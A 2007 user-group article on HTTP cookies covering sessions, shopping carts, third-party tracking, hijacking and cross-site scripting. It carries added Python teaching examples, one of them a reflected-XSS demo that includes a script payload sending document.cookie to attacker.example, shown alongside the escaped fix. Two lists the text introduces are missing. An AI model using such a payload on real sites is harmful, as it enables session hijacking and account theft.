CUGG Member Article

Cookies, Part 1

Eric Moore, CUGG

November 2007

Introduction

I gave a short presentation on the subject of cookies at the October
2007 meeting of CUGG. Although I covered the basics that every
computer user should know, time did not permit me to explore the
topic deeply or to address specific examples of how to manage cookies
with today's web browsers. This article, the first of two parts,
will serve as a follow-up to my presentation, covering the topic in
greater detail and providing links to online resources for more
information. Part 2, to be written for a future edition of Random
Access, will provide detailed information relating to cookie
management in four popular web browsers: Internet Explorer, Firefox,
Opera, and Safari.

Much of the material in this article is a paraphrase in my own words
of the full-length Wikipedia article on the topic of HTTP cookies.
All credit is due to the Wikipedia contributors, unless otherwise
noted.

What Is a Cookie?

An HTTP cookie, web cookie, or simply cookie, is a small piece of
arbitrary text data that a web server sends to a web browser and that
the browser returns to the server with its later requests. The browser
stores cookies on the user's computer, and the specifics of where they
are kept differ between browsers: Internet Explorer creates a separate
text file for each site that sets cookies, while Firefox keeps all of
the cookies it receives in a single file. A browser should return a
cookie only to the server that created it or to a server in the same
Internet domain as the originating server; it should never send one
site's cookies to an unrelated site. Most cookies expire after a
certain time. Some expire as soon as the browser is closed; these are
called session cookies. Other cookies are persistent, in that they
may be retained for days, weeks, or even longer.

Cookies were first introduced by Netscape in 1994 to implement a
virtual shopping cart. Before the introduction of cookies, transactions
between a web browser and a web server were stateless: each request
was handled on its own, and the server kept no memory of earlier ones.
When transactions are performed in a stateless manner, the web server
cannot tell whether a series of requests for one or more web pages
came from the same user. As far as the server is concerned, every
request for a page could come from a different user, so no provision
can be made to personalize the data sent to the user or to readily
determine who has the right to view information of a private or
personal nature.

By creating a cookie containing a unique, random identifier (a session
ID) and sending it to the user's web browser, the server arranges for
that identifier to come back automatically with every later request
the browser makes to the same site. The server looks up the identifier
and can then respond dynamically to the user's request. For example,
if Mary successfully logs into her online banking account, the server
sets a cookie that ties her browser to her login session. As long as
she remains logged in (and the cookie is not deleted or expired), Mary
can move easily from one page to the next as she checks her account
balances, transfers funds between accounts, downloads her monthly
statement, and performs other actions. Because the server associates
that cookie with Mary's account alone, it ensures that Mary sees only
her own information and not someone else's. The flip side is that
whoever presents the cookie is treated as Mary, so the identifier must
be impossible to guess and must be kept out of other people's hands.
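As an added example (this is my own illustration, not code from the
article or from any real banking site), here is a minimal server-side
session store in Python that does what the paragraph above describes:
the server issues a random session ID in a Set-Cookie header, the
browser echoes it back in a Cookie header, and the server maps it to
Mary's account. The user names, passwords and balances are made up, and
the Secure and HttpOnly attributes on the cookie are explained in the
comments.

```python
# Added example, not code from the article: a minimal server-side session
# store.  The server hands the browser an opaque, random session ID in a
# Set-Cookie header and later maps the ID the browser sends back in its
# Cookie header to an account.  Users, passwords and balances are made up.
import hmac
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "session"

# Constructed user table: username -> (password, balance).  A real site
# stores salted password hashes, never the passwords themselves.
ACCOUNTS = {
    "mary": ("correct horse battery staple", 1250.00),
    "ron": ("hunter2", 80.00),
}


class SessionStore:
    """Maps random session IDs to the usernames that logged in."""

    def __init__(self):
        self._sessions = {}  # session ID -> username

    def login(self, username, password):
        """Check credentials; return the Set-Cookie header value, or None."""
        record = ACCOUNTS.get(username)
        # compare_digest takes the same time whether or not the strings
        # match, so an attacker learns nothing from response timing.
        if record is None or not hmac.compare_digest(
                record[0].encode(), password.encode()):
            return None
        # 32 random bytes from the OS CSPRNG: the ID is unique and cannot be
        # guessed or enumerated, unlike a sequential "customer number 1234".
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = username
        # HttpOnly keeps page scripts from reading the cookie, Secure makes
        # the browser send it only over HTTPS, Path=/ covers the whole site.
        return f"{COOKIE_NAME}={session_id}; Path=/; Secure; HttpOnly"

    def user_for(self, cookie_header):
        """Resolve a request's Cookie header to a username, or None."""
        if not cookie_header:
            return None
        jar = SimpleCookie()
        jar.load(cookie_header)
        morsel = jar.get(COOKIE_NAME)
        if morsel is None:
            return None
        return self._sessions.get(morsel.value)

    def logout(self, cookie_header):
        """Invalidate the session so a captured cookie stops working."""
        jar = SimpleCookie()
        jar.load(cookie_header or "")
        morsel = jar.get(COOKIE_NAME)
        if morsel is not None:
            self._sessions.pop(morsel.value, None)


def browser_echo(set_cookie_value):
    """What the browser does with Set-Cookie: keep name=value and return it
    on later requests as the Cookie header (attributes are not echoed)."""
    return set_cookie_value.split(";", 1)[0]


def balance_page(store, cookie_header):
    """A protected page: the balance of whoever owns the session, or None
    (meaning 'please log in') when the cookie is missing or unknown."""
    user = store.user_for(cookie_header)
    return ACCOUNTS[user][1] if user else None


if __name__ == "__main__":
    store = SessionStore()
    set_cookie = store.login("mary", "correct horse battery staple")
    cookie = browser_echo(set_cookie)
    print("Mary sees:", balance_page(store, cookie))
    print("Guessed ID sees:", balance_page(store, "session=1234"))
    store.logout(cookie)
    print("After logout:", balance_page(store, cookie))
```

The point of the random ID is that the cookie itself proves nothing
about who Mary is; it is only a key into the server's table. Anyone who
presents a valid key is served as Mary, which is why the key must be
unguessable and why logging out should delete it on the server side,
not merely in the browser.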

What Purposes Are Cookies Used For?

As mentioned in the previous section, cookies can be used to recognize
a user who has logged into a site and to restrict her access to the
information associated with her account. Other functions for cookies
are web site personalization and virtual shopping carts. In the case
of site personalization, the user may choose how the site is to be
displayed. Such options can include displaying the site in a
particular language, emphasizing certain content such as news feeds,
or laying out the information in a particular way. For example, a
Google user may elect to view the page in another language and to see
thirty results per page for a web search. CNN gives the user the
option of viewing either the U.S. or the international edition of its
news site. In each case, the web server "knows" what the user expects
to see because of the preference saved in a cookie on the user's
computer.

When shopping on a web site such as Amazon.com or NewEgg.com, the
user's virtual shopping cart is referenced by a unique ID held in a
cookie; the cart contents themselves are usually kept on the server
under that ID, though some sites record the items in the cookie
itself. Because the browser sends the cookie with each page the user
requests, the server can maintain a current summary of what is in the
shopping cart and the running total as the user moves from page to
page. The shopping cart may even persist between browser sessions, so
the user can shut down the computer one day and then revisit the site
another day to continue where she left off.

Another use for cookies is web site tracking. Some companies create
cookies in order to gather data about users and their browsing habits.
Such cookies are known as third-party cookies, because they are set by
a server other than the one that serves the page the user is actually
viewing. For example, a web site (the first party) may display banner
ads or pictures for another company (the third party). Each ad or
picture may be hosted on a different server than the one that hosts
the main web page. When the web browser requests the ads and pictures
from the third-party server, that server can set its own cookies,
which the browser stores on the user's computer. The cookie typically
carries a unique identifier for the browser, and because the same
company's ads appear on many different sites, the third party receives
that identifier, together with the address of the page the ad was
displayed on, each time one of its ads is shown. Over time this lets
it build up a list of which web sites and pages the user has viewed.

The data in third-party cookies can be used for demographic analysis
or to create targeted advertisements based upon the particular sites
and web pages that a user visits. Although the collection of such data
is done without a name attached (the identifier is tied to a browser
rather than to a person), it is still of concern to some users who
would prefer to maintain some anonymity when browsing the web. I will
discuss more in this regard later in this article.
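To make the two preceding points concrete, here is an added example of
my own (not code from the article, and not how any particular browser
or advertising network is written): a simplified browser cookie jar
that applies the domain rule, expiry and the Secure attribute, plus a
simulated advertising server whose banner is embedded on two unrelated
sites. The host names news.example, shop.example and ads.example are
made up, and only the Max-Age form of expiry is handled.

```python
# Added example, not code from the article: a simplified browser cookie
# jar plus a simulated advertising server.  It shows the domain rule
# (a site's cookie goes back only to that site), expiry, and how one
# third-party cookie lets a tracker link visits to unrelated sites.
# All host names are made up; only Max-Age expiry is handled.
import secrets
import time
from urllib.parse import urlsplit


def domain_matches(host, cookie_domain):
    """A cookie for "shop.example" is sent to shop.example and to hosts
    below it such as www.shop.example, but never to news.example."""
    host, cookie_domain = host.lower(), cookie_domain.lower().lstrip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)


class CookieJar:
    """Holds cookies keyed by (domain, name) and decides which of them a
    request to a given URL may carry, the way a browser does."""

    def __init__(self, now=time.time):
        self._now = now        # injectable clock so expiry can be exercised
        self._cookies = {}     # (domain, name) -> attributes

    def receive(self, url, set_cookie):
        """Store the cookie from a Set-Cookie header sent by url's host."""
        host = urlsplit(url).hostname
        parts = [p.strip() for p in set_cookie.split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {k.lower(): v
                 for k, _, v in (p.partition("=") for p in parts[1:])}
        domain = attrs.get("domain", host).lstrip(".").lower()
        if not domain_matches(host, domain):
            return False       # a host may not set cookies for other sites
        expires = None         # None: session cookie, gone when browser closes
        if "max-age" in attrs:
            expires = self._now() + int(attrs["max-age"])
        self._cookies[(domain, name)] = {
            "value": value, "path": attrs.get("path", "/"),
            "expires": expires, "secure": "secure" in attrs,
        }
        return True

    def cookie_header(self, url):
        """The Cookie request header the browser would send to url, or None."""
        u = urlsplit(url)
        pairs = []
        for (domain, name), c in list(self._cookies.items()):
            if c["expires"] is not None and c["expires"] <= self._now():
                del self._cookies[(domain, name)]   # expired: forget it
            elif not domain_matches(u.hostname, domain):
                continue                            # another site's cookie
            elif not (u.path or "/").startswith(c["path"]):
                continue
            elif c["secure"] and u.scheme != "https":
                continue       # a Secure cookie never travels over plain HTTP
            else:
                pairs.append(f"{name}={c['value']}")
        return "; ".join(pairs) or None


class AdServer:
    """Third-party server whose banner is embedded on many sites.  It tags
    each new browser with a random ID cookie and logs, per impression, the
    first-party page the banner appeared on (reported in the Referer)."""

    def __init__(self):
        self.log = []          # (tracker ID, first-party page URL)

    def serve_banner(self, jar, referer):
        banner = "http://ads.example/banner.gif"
        sent = jar.cookie_header(banner) or ""
        cookies = dict(p.split("=", 1) for p in sent.split("; ") if p)
        uid = cookies.get("uid")
        if uid is None:        # first sight of this browser: tag it for a year
            uid = secrets.token_hex(8)
            jar.receive(banner, f"uid={uid}; Domain=ads.example; "
                                "Path=/; Max-Age=31536000")
        self.log.append((uid, referer))
        return uid


def browse():
    """Visit two unrelated first-party sites that both carry the banner."""
    jar, ads = CookieJar(), AdServer()
    jar.receive("http://news.example/", "edition=intl; Path=/")  # first party
    ads.serve_banner(jar, "http://news.example/world")
    ads.serve_banner(jar, "http://shop.example/cart")
    return jar, ads


if __name__ == "__main__":
    jar, ads = browse()
    print("news cookie sent to shop?", jar.cookie_header("http://shop.example/cart"))
    print("tracker log:", ads.log)  # the same uid appears on both lines
```

Notice that the domain rule is respected throughout: shop.example never
sees the edition cookie that news.example set. The tracker nonetheless
links the two visits, because the banner request goes to ads.example
from both pages, and ads.example is simply being sent back its own
cookie, exactly as the rules intend.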

Common Misconceptions

A number of misconceptions about cookies persist. Since cookies are
merely text data, not programs, they cannot run and cannot do any harm
in and of themselves. They are not viruses, spyware, or other
malicious software. They do not generate popups, nor are they used for
spamming. They are merely tokens of data that are passed between a web
server and the web browser. Furthermore, web browsers limit how big a
cookie can be and how many cookies may be stored at one time;
typically a cookie is limited to about 4 KB, and a browser keeps only
a few dozen cookies per site. Nonetheless, privacy concerns exist in
regard to the use and misuse of cookies.

Privacy Concerns

Although cookies are harmless by themselves, they can be used or
exploited to undermine a user's privacy. As previously mentioned,
tracking cookies are used for collecting data about a user's browsing
habits. Because a tracking cookie carries only an arbitrary identifier
rather than the user's name, its direct negative effect on the user is
limited, although a tracker that sees the same identifier across many
sites can still assemble a detailed picture of a browser's habits. To
paraphrase Douglas Adams, author of The Hitchhiker's Guide to the
Galaxy, cookies are "mostly harmless."

On the other hand, a more insidious problem does exist: cookie
hijacking. Cookies may be captured by an unauthorized person and used
to impersonate the victim in order to gain access to personal
information such as a bank account; the server cannot tell a stolen
session cookie from the real one. Cookie hijacking may be accomplished
by means of packet sniffing, where a person uses software to capture
the cookie data as it travels across a network in the clear, for
instance over an open wireless network. The originating web server can
mitigate this threat by sending the cookie only over an encrypted
HTTPS connection (by marking it Secure, which tells the browser never
to send it over plain HTTP), but not all servers do so. Note that
merely encrypting the contents of the cookie does not help: an
eavesdropper can replay the encrypted value just as well as a plain
one.

Another method by which unauthorized access to cookies may be
accomplished is cross-site scripting. Here the flaw is in the web site
rather than the browser: if a site echoes user-supplied text into its
pages without neutralizing it, an attacker can plant a script that
runs as part of that site's own pages, reads the site's cookies, and
sends them to the attacker. Separately, older versions of some
browsers had security flaws that made it possible for one web site to
read the cookies created by a foreign web site. Your best defense as a
user is to use a modern web browser such as Internet Explorer 7 or
Firefox 2.0 and keep it up to date; site operators, for their part,
should escape what they echo and mark sensitive cookies HttpOnly so
that scripts in the page cannot read them. More on the subject of
updating your web browser will be covered in Part 2 of my article.
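As an added illustration of the cross-site scripting problem (my own
example, not code from the article or from any real site), here is a
search page in Python that echoes the user's query back into its HTML.
The first version pastes the query in raw, so a crafted link can plant
a script that reads document.cookie and sends it to an attacker; the
second escapes it. The page, the query parameter, and the host name
attacker.example are all made up.

```python
# Added example, not code from the article: a search page that reflects
# the user's query.  The vulnerable version pastes it into the HTML raw;
# the fixed version escapes it.  Names and host names are made up.
import html

# Query an attacker would put in a link such as
# http://site.example/search?q=<payload>.  Inside site.example's own page
# the script can read site.example's cookies and ship them off-site.
STEAL_COOKIE = ("<script>new Image().src='http://attacker.example/?c='"
                "+document.cookie</script>")

# A second payload that breaks out of an attribute instead of opening a
# tag, to show that quotes must be escaped as well as angle brackets.
BREAK_OUT = '" autofocus onfocus="alert(document.cookie)'


def search_page_vulnerable(query):
    """Reflects the query verbatim, so the attacker controls part of the
    page's HTML (this is the flaw, shown here on purpose)."""
    return (f"<h1>Results for {query}</h1>\n"
            f'<input name="q" value="{query}">')


def search_page_fixed(query):
    """Escapes <, >, &, ' and ", so the query is displayed as text and can
    neither open a tag nor break out of the value="..." attribute."""
    safe = html.escape(query, quote=True)
    return (f"<h1>Results for {safe}</h1>\n"
            f'<input name="q" value="{safe}">')


def contains_script(page):
    """Rough check for an injected tag (sufficient for this demonstration)."""
    return "<script" in page.lower()


def document_cookie(set_cookie_headers):
    """What an injected script sees in document.cookie: every cookie the
    site set except those marked HttpOnly (simplified browser behaviour).
    Marking the session cookie HttpOnly limits the damage if escaping is
    ever missed somewhere."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        if not any(p.lower() == "httponly" for p in parts[1:]):
            visible.append(parts[0])
    return "; ".join(visible)


if __name__ == "__main__":
    print(search_page_vulnerable(STEAL_COOKIE))
    print(search_page_fixed(STEAL_COOKIE))
    print(document_cookie(["session=abc123; Path=/; Secure; HttpOnly",
                           "edition=intl; Path=/"]))  # only edition=intl
```

The two defenses are complementary: escaping stops the script from
being planted in the first place, and HttpOnly means that a session
cookie stays out of document.cookie even on a page where escaping was
forgotten.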

Problems with Cookies

In addition to the aforementioned privacy concerns, cookies have other
potential problems. Cookies are stored in cookie files on the hard
drive, so they do take up space that could otherwise be used for
storing more useful data, although, given the size limits mentioned
above, the amount is trivial. All browsers provide means for managing
cookies, as I will explain in the next section.

Cookies may contain incomplete or out-of-date data, because each
cookie lives on one computer in one browser. For example, if Ron logs
into his home computer and visits NewEgg to shop for a new computer,
any items he places in his shopping cart are tied to the cookie on his
home computer. If he subsequently shops NewEgg's web site from his
work computer, a different shopping cart will be created, and it will
not reflect the items he selected while using his home computer.
Likewise, cookie data is not shared between browsers, so anything he
added to his shopping cart while using Firefox will not be visible
when he uses Internet Explorer.

In another example, if Ron, Dick, and Jamie share a Windows 98
computer, which does not support separate user accounts, and each uses
the same web browser, all cookie data for the three users will be
intermingled. This could create anything from minor inconveniences, in
the case of a shared shopping cart for NewEgg, to privacy concerns,
should one person choose to have himself logged into his banking site
automatically. The best solution is for each user to use a separate
computer or for the three users to use a newer operating system such
as Windows XP, Windows Vista, Mac OS X, or Linux. When each user has
his own separate account, each one's cookies remain private and
separate from the other users' cookies.

Cookie Management

Web browsers provide users with the means of managing cookies, from
deciding which cookies to accept and which to reject, to choosing when
they should be deleted. The particular features vary between different
brands of web browsers and even between different versions of the same
browser. I will cover in greater detail in Part 2 what options are
available in the most popular browsers. To summarize for now, among
the options that may be available are:

The following are just some of the available resources on cookies.
Many more are available. For information on third-party utilities for
managing cookies, you can search popular download sites such as
tucows.com and Download.com. You can also find reviews of useful cookie
tools and information on the web sites for PC World and PC Magazine.